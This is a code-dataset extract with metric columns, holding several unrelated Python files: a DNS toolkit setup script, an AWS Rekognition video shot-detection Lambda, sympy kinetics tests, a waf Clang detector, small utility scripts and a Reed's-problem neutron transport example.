| 0
| 0
| 0.127974
| 0.01538
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097222
| false
| 0.027778
| 0.125
| 0
| 0.347222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e2d53249be23d06d560e65260043ec473bab942
| 1,159
|
py
|
Python
|
setup.py
|
CZ-NIC/deckard
|
35ed3c59b27c52fc2e3a187679251353f5efe6c0
|
[
"BSD-2-Clause"
] | 30
|
2016-08-06T20:56:17.000Z
|
2021-12-13T07:56:23.000Z
|
setup.py
|
CZ-NIC/deckard
|
35ed3c59b27c52fc2e3a187679251353f5efe6c0
|
[
"BSD-2-Clause"
] | 6
|
2016-05-31T10:48:51.000Z
|
2018-07-03T09:05:12.000Z
|
setup.py
|
CZ-NIC/deckard
|
35ed3c59b27c52fc2e3a187679251353f5efe6c0
|
[
"BSD-2-Clause"
] | 10
|
2016-04-03T13:55:19.000Z
|
2020-11-28T01:23:49.000Z
|
#!/usr/bin/env python3
from distutils.core import setup
version = '3.0'
setup(
name='deckard',
version=version,
description='DNS toolkit',
long_description=(
"Deckard is a DNS software testing based on library pydnstest."
"It supports parsing and running Unbound-like test scenarios,"
"and setting up a mock DNS server. It's based on dnspython."),
author='CZ.NIC',
author_email='knot-dns-users@lists.nic.cz',
license='BSD',
url='https://gitlab.labs.nic.cz/knot/deckard',
packages=['pydnstest'],
python_requires='>=3.5',
install_requires=[
'dnspython>=1.15',
'jinja2',
'PyYAML',
'python-augeas'
],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3 :: Only',
'Operating System :: POSIX :: Linux',
'Topic :: Internet :: Name Service (DNS)',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Software Development :: Testing',
]
)
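# Note (added): adjacent string literals in Python concatenate implicitly, so a
# missing comma in a classifiers list silently merges two entries instead of
# raising an error. A minimal illustration:
#
#     items = ['a' 'b', 'c']   # -> ['ab', 'c'], only two entries
#
# which is why the comma after the 'Programming Language' classifier above matters.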
| 31.324324
| 71
| 0.609146
| 127
| 1,159
| 5.527559
| 0.669291
| 0.055556
| 0.102564
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011521
| 0.251079
| 1,159
| 36
| 72
| 32.194444
| 0.797235
| 0.018119
| 0
| 0
| 0
| 0
| 0.583993
| 0.023747
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.030303
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e301c912b42abb46c781523b9340a9c6ccd01d4
| 13,317
|
py
|
Python
|
source/mre-plugin-samples/Plugins/DetectShotsByRekognitionVideo/DetectShotsByRekognitionVideo.py
|
aws-samples/aws-media-replay-engine-samples
|
d9b479f3c7da87c8b6d2a265334a6d3aae58d885
|
[
"MIT-0"
] | 4
|
2022-02-03T17:23:19.000Z
|
2022-03-16T13:13:09.000Z
|
source/mre-plugin-samples/Plugins/DetectShotsByRekognitionVideo/DetectShotsByRekognitionVideo.py
|
aws-samples/aws-media-replay-engine-samples
|
d9b479f3c7da87c8b6d2a265334a6d3aae58d885
|
[
"MIT-0"
] | 1
|
2022-02-22T01:25:57.000Z
|
2022-03-10T21:27:31.000Z
|
source/mre-plugin-samples/Plugins/DetectShotsByRekognitionVideo/DetectShotsByRekognitionVideo.py
|
aws-samples/aws-media-replay-engine-samples
|
d9b479f3c7da87c8b6d2a265334a6d3aae58d885
|
[
"MIT-0"
] | 1
|
2022-02-16T02:23:43.000Z
|
2022-02-16T02:23:43.000Z
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import boto3
import json
import sys
import time
import ffmpeg
import logging
from botocore.exceptions import ClientError  # used in lambda_handler's upload error path
from MediaReplayEnginePluginHelper import OutputHelper
from MediaReplayEnginePluginHelper import Status
from MediaReplayEnginePluginHelper import DataPlane
s3_client = boto3.client('s3')
class VideoDetect:
jobId = ''
rek = boto3.client('rekognition')
sqs = boto3.client('sqs')
sns = boto3.client('sns')
roleArn = ''
bucket = ''
video = ''
startJobId = ''
sqsQueueUrl = ''
snsTopicArn = ''
processType = ''
def __init__(self, role, bucket, video):
self.roleArn = role
self.bucket = bucket
self.video = video
def GetSQSMessageSuccess(self):
jobFound = False
succeeded = False
dotLine=0
while jobFound == False:
sqsResponse = self.sqs.receive_message(QueueUrl=self.sqsQueueUrl, MessageAttributeNames=['ALL'],
MaxNumberOfMessages=10)
###print(sqsResponse)
if sqsResponse:
if 'Messages' not in sqsResponse:
if dotLine<100:
print('.', end='')
dotLine=dotLine+1
else:
print()
dotLine=0
print('TIMEOUT')
break
sys.stdout.flush()
time.sleep(5)
continue
for message in sqsResponse['Messages']:
notification = json.loads(message['Body'])
rekMessage = json.loads(notification['Message'])
print(rekMessage['JobId'])
print(rekMessage['Status'])
if rekMessage['JobId'] == self.startJobId:
print('Matching Job Found:' + rekMessage['JobId'])
jobFound = True
if (rekMessage['Status']=='SUCCEEDED'):
succeeded=True
self.sqs.delete_message(QueueUrl=self.sqsQueueUrl,
ReceiptHandle=message['ReceiptHandle'])
else:
print("Job didn't match:" +
str(rekMessage['JobId']) + ' : ' + self.startJobId)
# Delete the unknown message. Consider sending to dead letter queue
self.sqs.delete_message(QueueUrl=self.sqsQueueUrl,
ReceiptHandle=message['ReceiptHandle'])
return succeeded
def CreateTopicandQueue(self):
millis = str(int(round(time.time() * 1000)))
#Create SNS topic
snsTopicName="AmazonRekognitionExample" + millis
topicResponse=self.sns.create_topic(Name=snsTopicName)
self.snsTopicArn = topicResponse['TopicArn']
print('SNS created',snsTopicName)
#create SQS queue
sqsQueueName="AmazonRekognitionQueue" + millis
self.sqs.create_queue(QueueName=sqsQueueName)
self.sqsQueueUrl = self.sqs.get_queue_url(QueueName=sqsQueueName)['QueueUrl']
attribs = self.sqs.get_queue_attributes(QueueUrl=self.sqsQueueUrl,
AttributeNames=['QueueArn'])['Attributes']
sqsQueueArn = attribs['QueueArn']
print('SQS created',sqsQueueName)
# Subscribe SQS queue to SNS topic
self.sns.subscribe(
TopicArn=self.snsTopicArn,
Protocol='sqs',
Endpoint=sqsQueueArn)
#Authorize SNS to write SQS queue
policy = """{{
"Version":"2012-10-17",
"Statement":[
{{
"Sid":"MyPolicy",
"Effect":"Allow",
"Principal" : {{"AWS" : "*"}},
"Action":"SQS:SendMessage",
"Resource": "{}",
"Condition":{{
"ArnEquals":{{
"aws:SourceArn": "{}"
}}
}}
}}
]
}}""".format(sqsQueueArn, self.snsTopicArn)
response = self.sqs.set_queue_attributes(
QueueUrl = self.sqsQueueUrl,
Attributes = {
'Policy' : policy
})
def DeleteTopicandQueue(self):
self.sqs.delete_queue(QueueUrl=self.sqsQueueUrl)
self.sns.delete_topic(TopicArn=self.snsTopicArn)
def StartSegmentDetection(self, use_sns=False):
min_Technical_Cue_Confidence = 80.0
min_Shot_Confidence = 60.0
max_pixel_threshold = 0.1
min_coverage_percentage = 60
if use_sns:
response = self.rek.start_segment_detection(
Video={"S3Object": {"Bucket": self.bucket, "Name": self.video}},
NotificationChannel={
"RoleArn": self.roleArn,
"SNSTopicArn": self.snsTopicArn,
},
SegmentTypes=["TECHNICAL_CUE", "SHOT"],
Filters={
"TechnicalCueFilter": {
"MinSegmentConfidence": min_Technical_Cue_Confidence,
# "BlackFrame": {
# "MaxPixelThreshold": max_pixel_threshold,
# "MinCoveragePercentage": min_coverage_percentage,
# },
},
"ShotFilter": {"MinSegmentConfidence": min_Shot_Confidence},
}
)
else:
response = self.rek.start_segment_detection(
Video={"S3Object": {"Bucket": self.bucket, "Name": self.video}},
SegmentTypes=["TECHNICAL_CUE", "SHOT"],
Filters={
"TechnicalCueFilter": {
"MinSegmentConfidence": min_Technical_Cue_Confidence,
# "BlackFrame": {
# "MaxPixelThreshold": max_pixel_threshold,
# "MinCoveragePercentage": min_coverage_percentage,
# },
},
"ShotFilter": {"MinSegmentConfidence": min_Shot_Confidence},
}
)
self.startJobId = response["JobId"]
print(f"Start Job Id: {self.startJobId}")
def GetSegmentDetectionResults(self, chunk_start):
maxResults = 10
paginationToken = ""
finished = False
firstTime = True
outlist = []
while finished == False:
response = self.rek.get_segment_detection(
JobId=self.startJobId, MaxResults=maxResults, NextToken=paginationToken
)
#print(response)
if response['JobStatus'] == 'IN_PROGRESS':
print('waiting 10s')
time.sleep(10)
continue
if firstTime == True:
print(f"Status\n------\n{response['JobStatus']}")
print("\nRequested Types\n---------------")
for selectedSegmentType in response['SelectedSegmentTypes']:
print(f"\tType: {selectedSegmentType['Type']}")
print(f"\t\tModel Version: {selectedSegmentType['ModelVersion']}")
print()
print("\nAudio metadata\n--------------")
for audioMetadata in response['AudioMetadata']:
print(f"\tCodec: {audioMetadata['Codec']}")
print(f"\tDuration: {audioMetadata['DurationMillis']}")
print(f"\tNumber of Channels: {audioMetadata['NumberOfChannels']}")
print(f"\tSample rate: {audioMetadata['SampleRate']}")
print()
print("\nVideo metadata\n--------------")
for videoMetadata in response["VideoMetadata"]:
print(videoMetadata)
print(f"\tCodec: {videoMetadata['Codec']}")
#print(f"\tColor Range: {videoMetadata['ColorRange']}")
print(f"\tDuration: {videoMetadata['DurationMillis']}")
print(f"\tFormat: {videoMetadata['Format']}")
print(f"\tFrame rate: {videoMetadata['FrameRate']}")
print("\nSegments\n--------")
firstTime = False
for segment in response['Segments']:
if segment["Type"] == "TECHNICAL_CUE":
print("Technical Cue")
print(f"\tConfidence: {segment['TechnicalCueSegment']['Confidence']}")
print(f"\tType: {segment['TechnicalCueSegment']['Type']}")
if segment["Type"] == "SHOT":
print("Shot")
print(f"\tConfidence: {segment['ShotSegment']['Confidence']}")
print(f"\tIndex: " + str(segment["ShotSegment"]["Index"]))
outputSeg = {}
outputSeg['Label'] = 'SHOT'
outputSeg['beg'] = segment['StartTimecodeSMPTE']
outputSeg['end'] = segment['EndTimecodeSMPTE']
outputSeg['duration'] = segment['DurationSMPTE']
outlist.append(outputSeg)
print(f"\tDuration (milliseconds): {segment['DurationMillis']}")
print(f"\tStart Timestamp (milliseconds): {segment['StartTimestampMillis']}")
print(f"\tEnd Timestamp (milliseconds): {segment['EndTimestampMillis']}")
print(f"\tStart timecode: {segment['StartTimecodeSMPTE']}")
print(f"\tEnd timecode: {segment['EndTimecodeSMPTE']}")
print(f"\tDuration timecode: {segment['DurationSMPTE']}")
print(f"\tStart frame number {segment['StartFrameNumber']}")
print(f"\tEnd frame number: {segment['EndFrameNumber']}")
print(f"\tDuration frames: {segment['DurationFrames']}")
print()
if "NextToken" in response:
paginationToken = response["NextToken"]
else:
finished = True
times_sec = []
begs_sec = []
results = []
for out in outlist:
time_str = out['duration']
# SMPTE timecodes are HH:MM:SS:FF (or HH:MM:SS;FF); the last field is a frame
# count, so dividing by 60 assumes a ~60 fps source.
hh, mm, ss, ff = map(int, time_str.replace(';', ':').split(':'))
time_sec = float("{:.2f}".format(ff/60 + ss + 60*(mm + 60*hh)))
print(time_str,time_sec)
times_sec.append(time_sec)
beg_str = out['beg']
hh, mm, ss, ff = map(int, beg_str.replace(';', ':').split(':'))
beg_sec = float("{:.2f}".format(ff/60 + ss + 60*(mm + 60*hh))) + chunk_start
print(beg_str,beg_sec)
begs_sec.append(beg_sec)
results.append({'Label':'SHOT','Start':beg_sec,'Duration':time_sec})
return results
def lambda_handler(event, context):
results = []
mre_dataplane = DataPlane(event)
# 'event' is the input event payload passed to Lambda
mre_outputhelper = OutputHelper(event)
# Replace following with the ARN of the AmazonRekognitionServiceRole
roleArn = 'arn:aws:iam::ACCOUNTNUMBER:role/AmazonRekognitionServiceRole'
bucket = event['Input']['Media']["S3Bucket"]
video = event['Input']['Media']["S3Key"] #"***.ts"
chunk_start = event['Input']['Metadata']['HLSSegment']['StartTime']
try:
# Download the HLS video segment from S3
media_path = mre_dataplane.download_media()
mp4_path = '/tmp/mre_chunk.mp4'
try:
stream = ffmpeg.input(media_path)
out, err = (
ffmpeg.output(stream,mp4_path)
.run(capture_stdout=True, capture_stderr=True,overwrite_output=True)
)
except ffmpeg.Error as err:
print(err.stderr)
raise
try:
video_mp4 = video[:-2]+'mp4'
response = s3_client.upload_file(mp4_path, bucket, video_mp4)
except ClientError as e:
logging.error(e)
return False
print(f'{media_path} converted to {mp4_path} and uploaded to {video_mp4}')
analyzer=VideoDetect(roleArn, bucket,video_mp4)
analyzer.StartSegmentDetection()
results = analyzer.GetSegmentDetectionResults(chunk_start)
print(f'results:{results}')
# Add the results of the plugin to the payload (required if the plugin status is "complete"; Optional if the plugin has any errors)
mre_outputhelper.add_results_to_output(results)
# Persist plugin results for later use
mre_dataplane.save_plugin_results(results)
# Update the processing status of the plugin (required)
mre_outputhelper.update_plugin_status(Status.PLUGIN_COMPLETE)
# Returns expected payload built by MRE helper library
return mre_outputhelper.get_output_object()
except Exception as e:
print(e)
# Update the processing status of the plugin (required)
mre_outputhelper.update_plugin_status(Status.PLUGIN_ERROR)
# Re-raise the exception to MRE processing where it will be handled
raise
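# Added sketch: a minimal test event for local invocation. The bucket/key
# values are placeholders; the field layout mirrors the accesses in
# lambda_handler above (Input.Media.S3Bucket / S3Key and
# Input.Metadata.HLSSegment.StartTime).
def _demo_event():
    return {
        'Input': {
            'Media': {'S3Bucket': 'my-example-bucket', 'S3Key': 'chunks/chunk00.ts'},
            'Metadata': {'HLSSegment': {'StartTime': 0.0}},
        }
    }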
| 39.283186
| 139
| 0.535181
| 1,139
| 13,317
| 6.152766
| 0.296752
| 0.023973
| 0.019692
| 0.012842
| 0.158676
| 0.147831
| 0.143836
| 0.143836
| 0.143836
| 0.143836
| 0
| 0.008759
| 0.348427
| 13,317
| 338
| 140
| 39.399408
| 0.798894
| 0.086431
| 0
| 0.15444
| 0
| 0
| 0.21319
| 0.077988
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.030888
| 0
| 0.119691
| 0.196911
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e316afea9883b374b2578dfd94ecad511320c5f
| 1,567
|
py
|
Python
|
chempy/kinetics/tests/test_integrated.py
|
matecsaj/chempy
|
2c93f185e4547739331193c06d77282206621517
|
[
"BSD-2-Clause"
] | null | null | null |
chempy/kinetics/tests/test_integrated.py
|
matecsaj/chempy
|
2c93f185e4547739331193c06d77282206621517
|
[
"BSD-2-Clause"
] | null | null | null |
chempy/kinetics/tests/test_integrated.py
|
matecsaj/chempy
|
2c93f185e4547739331193c06d77282206621517
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import division
from chempy.util.testing import requires
from ..integrated import pseudo_irrev, pseudo_rev, binary_irrev, binary_rev
import pytest
try:
import sympy
except ImportError:
sympy = None
else:
one = sympy.S(1)
t, kf, kb, prod, major, minor = sympy.symbols(
't kf kb prod major minor', negative=False, nonnegative=True, real=True)
subsd = {t: one*2, kf: one*3, kb: one*7, major: one*11,
minor: one*13, prod: one*0}
@requires('sympy')
def test_pseudo_irrev():
f = pseudo_irrev(t, kf, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
assert (num_dfdt - (
major*kf*(minor - f)
).subs(subsd)).simplify() == 0
@requires('sympy')
def test_pseudo_rev():
f = pseudo_rev(t, kf, kb, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
assert (num_dfdt - (major*kf*(minor - f) - kb*f).subs(subsd)).simplify() == 0
@pytest.mark.slow
@requires('sympy')
def test_binary_irrev():
f = binary_irrev(t, kf, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
assert (num_dfdt - (kf*(minor - f)*(major - f)).subs(subsd)).simplify() == 0
@pytest.mark.slow
@requires('sympy')
def test_binary_rev():
f = binary_rev(t, kf, kb, prod, major, minor, backend=sympy)
dfdt = f.diff(t)
num_dfdt = dfdt.subs(subsd)
ans = kf*(minor - f)*(major - f) - kb*f
# symbolic substitution fails:
assert abs(float(num_dfdt) - float(ans.subs(subsd))) < 2e-14
| 27.017241
| 81
| 0.640715
| 240
| 1,567
| 4.066667
| 0.258333
| 0.057377
| 0.086066
| 0.036885
| 0.589139
| 0.544057
| 0.449795
| 0.449795
| 0.449795
| 0.449795
| 0
| 0.012019
| 0.203574
| 1,567
| 57
| 82
| 27.491228
| 0.770032
| 0.017869
| 0
| 0.325581
| 0
| 0
| 0.028627
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 1
| 0.093023
| false
| 0
| 0.139535
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e36f2c784f6f44bd775bdedd2272a8be3601516
| 525
|
py
|
Python
|
src/response.py
|
vcokltfre/snowflake.vcokltf.re
|
5b8324a4fbc2e512dbc263d4ed65edb89d72a549
|
[
"MIT"
] | 1
|
2021-03-23T15:13:04.000Z
|
2021-03-23T15:13:04.000Z
|
src/response.py
|
vcokltfre/snowflake.vcokltf.re
|
5b8324a4fbc2e512dbc263d4ed65edb89d72a549
|
[
"MIT"
] | null | null | null |
src/response.py
|
vcokltfre/snowflake.vcokltf.re
|
5b8324a4fbc2e512dbc263d4ed65edb89d72a549
|
[
"MIT"
] | null | null | null |
from starlette.responses import HTMLResponse
class ResponseBuilder:
def __init__(self):
self.items = []
def addtag(self, name: str, value: str):
self.items.append((name, value))
def build(self):
og_tags = ""
for item in self.items:
og_tags += f"\n<meta property=\"og:{item[0]}\" content=\"{item[1]}\">"
return HTMLResponse(f"""
<html>
<head>
{og_tags}
</head>
</html>
""")
| 23.863636
| 82
| 0.485714
| 55
| 525
| 4.509091
| 0.581818
| 0.108871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006024
| 0.367619
| 525
| 21
| 83
| 25
| 0.740964
| 0
| 0
| 0
| 0
| 0
| 0.293333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3a0239409f0db941b17e1b31a07a8a3ed673cb
| 694
|
py
|
Python
|
lectures/extensions/hyperbolic_discounting/replication_code/.mywaflib/waflib/Tools/clang.py
|
loikein/ekw-lectures
|
a2f5436f10515ab26eab323fca8c37c91bdc5dcd
|
[
"MIT"
] | 4
|
2019-11-15T15:21:27.000Z
|
2020-07-08T15:04:30.000Z
|
lectures/extensions/hyperbolic_discounting/replication_code/.mywaflib/waflib/Tools/clang.py
|
loikein/ekw-lectures
|
a2f5436f10515ab26eab323fca8c37c91bdc5dcd
|
[
"MIT"
] | 9
|
2019-11-18T15:54:36.000Z
|
2020-07-14T13:56:53.000Z
|
lectures/extensions/hyperbolic_discounting/replication_code/.mywaflib/waflib/Tools/clang.py
|
loikein/ekw-lectures
|
a2f5436f10515ab26eab323fca8c37c91bdc5dcd
|
[
"MIT"
] | 3
|
2021-01-25T15:41:30.000Z
|
2021-09-21T08:51:36.000Z
|
#!/usr/bin/env python
# Krzysztof Kosiński 2014
"""
Detect the Clang C compiler
"""
from waflib.Configure import conf
from waflib.Tools import ar
from waflib.Tools import ccroot
from waflib.Tools import gcc
@conf
def find_clang(conf):
"""
Finds the program clang and executes it to ensure it really is clang
"""
cc = conf.find_program("clang", var="CC")
conf.get_cc_version(cc, clang=True)
conf.env.CC_NAME = "clang"
def configure(conf):
conf.find_clang()
conf.find_program(["llvm-ar", "ar"], var="AR")
conf.find_ar()
conf.gcc_common_flags()
conf.gcc_modifier_platform()
conf.cc_load_tools()
conf.cc_add_flags()
conf.link_add_flags()
| 22.387097
| 72
| 0.693084
| 106
| 694
| 4.367925
| 0.433962
| 0.086393
| 0.097192
| 0.136069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007067
| 0.184438
| 694
| 30
| 73
| 23.133333
| 0.810954
| 0.20317
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.222222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3b5a48a7befde960b0ddd0c42b6f209d9a2b77
| 457
|
py
|
Python
|
test_lambda_function.py
|
gavinbull/loyalty_anagram
|
a91d23083d8c040916733751932fb47d00592890
|
[
"MIT"
] | null | null | null |
test_lambda_function.py
|
gavinbull/loyalty_anagram
|
a91d23083d8c040916733751932fb47d00592890
|
[
"MIT"
] | null | null | null |
test_lambda_function.py
|
gavinbull/loyalty_anagram
|
a91d23083d8c040916733751932fb47d00592890
|
[
"MIT"
] | null | null | null |
import unittest
from lambda_function import gather_anagrams
class TestSum(unittest.TestCase):
def test_list_int(self):
"""
Basic unit test verifying the anagrams returned for "iceman" (anemic, cinema, iceman).
"""
test_word = "iceman"
get_result = gather_anagrams(test_word)
expected = ['anemic', 'cinema', 'iceman']
self.assertEqual(get_result, expected)
if __name__ == '__main__':
unittest.main()
| 28.5625
| 86
| 0.654267
| 52
| 457
| 5.423077
| 0.692308
| 0.099291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.251641
| 457
| 15
| 87
| 30.466667
| 0.824561
| 0.153173
| 0
| 0
| 0
| 0
| 0.090141
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3d9a4ab5c166e9fe2b7e4de49e51e3488a6de5
| 577
|
py
|
Python
|
euler62.py
|
dchourasia/euler-solutions
|
e20cbf016a9ea601fcce928d9690930c9a498837
|
[
"Apache-2.0"
] | null | null | null |
euler62.py
|
dchourasia/euler-solutions
|
e20cbf016a9ea601fcce928d9690930c9a498837
|
[
"Apache-2.0"
] | null | null | null |
euler62.py
|
dchourasia/euler-solutions
|
e20cbf016a9ea601fcce928d9690930c9a498837
|
[
"Apache-2.0"
] | null | null | null |
'''
Find the smallest cube for which exactly five permutations of its digits are cube.
'''
import math, itertools
print(math.pow(8, 1/3).is_integer())
tried = {}
for i in range(1000, 1200):
cb = int(math.pow(i, 3))
#print(cb)
#print(math.pow(int(cb), 1/3))
roots = 1
tried[i] = [str(cb)]
for x in itertools.permutations(str(cb)):
x = ''.join(x)
        if x not in tried[i]:
            y = round(math.pow(int(x), 1/3))
            if y**3 == int(x):
                roots += 1
                tried[i].append(x)
                print(roots, i, y, x)
if roots == 5:
print(cb)
break
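# A faster, standard approach (a sketch added for illustration, not part of the
# original solution): group cubes by their sorted digit string, so digit
# permutations share one dictionary key. The first key that collects five
# cubes yields the answer as the smallest member of its group.
from collections import defaultdict

groups = defaultdict(list)
n = 1
while True:
    cube = n ** 3
    key = ''.join(sorted(str(cube)))
    groups[key].append(cube)
    if len(groups[key]) == 5:
        print(min(groups[key]))
        break
    n += 1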
| 21.37037
| 82
| 0.587522
| 106
| 577
| 3.188679
| 0.396226
| 0.08284
| 0.071006
| 0.071006
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046256
| 0.213172
| 577
| 27
| 83
| 21.37037
| 0.698238
| 0.259965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e3eca14631d828c95eda787a3d066e5994ecfdb
| 3,010
|
py
|
Python
|
examples/reeds_problem.py
|
bwhewe-13/ants
|
6923cfc1603e0cd90c2ae90fa0fed6dd86edc0b2
|
[
"MIT"
] | null | null | null |
examples/reeds_problem.py
|
bwhewe-13/ants
|
6923cfc1603e0cd90c2ae90fa0fed6dd86edc0b2
|
[
"MIT"
] | null | null | null |
examples/reeds_problem.py
|
bwhewe-13/ants
|
6923cfc1603e0cd90c2ae90fa0fed6dd86edc0b2
|
[
"MIT"
] | null | null | null |
from ants.medium import MediumX
from ants.materials import Materials
from ants.mapper import Mapper
from ants.multi_group import source_iteration
import numpy as np
import matplotlib.pyplot as plt
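# Reed's problem: a classic 1-D, one-group, fixed-source transport benchmark on
# a 16 cm slab whose regions mix vacuum, pure absorbers, strong scatterers, and
# a strong source, which is what the piecewise cross sections below encode.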
def reeds(cells):
width = 16.
delta_x = width/cells
group = 1
    edges = [0, 2, 3, 5, 6, 10, 11, 13, 14, 16]
    boundaries = [slice(int(edges[i] / delta_x), int(edges[i + 1] / delta_x))
                  for i in range(len(edges) - 1)]
total_xs = np.zeros((cells,group),dtype='float64')
total_vals = [10,10,0,5,50,5,0,10,10]
# total_vals = [1,1,0,5,50,5,0,1,1]
scatter_xs = np.zeros((cells,group,group),dtype='float64')
scatter_vals = [9.9,9.9,0,0,0,0,0,9.9,9.9]
# scatter_vals = [0.9,0.9,0,0,0,0,0,0.9,0.9]
source = np.zeros((cells,group),dtype='float64')
source_vals = [0,1,0,0,50,0,0,1,0]
for ii in range(len(boundaries)):
total_xs[boundaries[ii]] = total_vals[ii]
scatter_xs[boundaries[ii]] = np.diag(np.repeat(scatter_vals[ii],group))
source[boundaries[ii]] = source_vals[ii]
# scatter_xs = np.ones((cells,group,group),dtype='float64') * 0.1
return total_xs, scatter_xs, source
groups = 1
cells_x = 1000
medium_width = 16.
cell_width_x = medium_width / cells_x
angles = 16
xbounds = np.array([1, 0])
materials = ['reed-vacuum', 'reed-strong-source', \
'reed-scatter','reed-absorber']
problem_01 = Materials(materials, 1, None)
medium = MediumX(cells_x, cell_width_x, angles, xbounds)
medium.add_external_source("reed")
map_obj = Mapper.load_map('reed_problem2.mpr')
if cells_x != map_obj.cells_x:
map_obj.adjust_widths(cells_x)
reversed_key = {v: k for k, v in map_obj.map_key.items()}
total = []
scatter = []
fission = []
for position in range(len(map_obj.map_key)):
map_material = reversed_key[position]
total.append(problem_01.data[map_material][0])
scatter.append(problem_01.data[map_material][1])
fission.append(problem_01.data[map_material][2])
total = np.array(total)
scatter = np.array(scatter)
fission = np.array(fission)
print(map_obj.map_key.keys())
print(problem_01.data.keys())
mu_x = medium.mu_x
weight = medium.weight
print(mu_x)
print(weight)
medium_map = map_obj.map_x.astype(int)
phi = source_iteration(groups, mu_x / cell_width_x, weight, total, scatter, \
fission, medium.ex_source, medium_map, xbounds, \
cell_width_x)
print(medium.ex_source.shape)
fig, ax = plt.subplots()
solution = np.load('reed_solution.npy')
print(len(solution))
print(np.allclose(solution, phi[:,0],atol=1e-12))
ax.plot(np.linspace(0, 16, len(solution)), solution, label='solution', c='k', ls='--')
ax.plot(np.linspace(0, medium_width, cells_x), phi[:,0], label='New', c='r', alpha=0.6)
ax.legend(loc=0)
plt.show()
| 29.80198
| 87
| 0.679734
| 514
| 3,010
| 3.805447
| 0.225681
| 0.055215
| 0.04499
| 0.05726
| 0.140082
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0.054033
| 0.151495
| 3,010
| 101
| 88
| 29.80198
| 0.711825
| 0.046512
| 0
| 0
| 0
| 0
| 0.044646
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0.084507
| 0
| 0.112676
| 0.098592
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
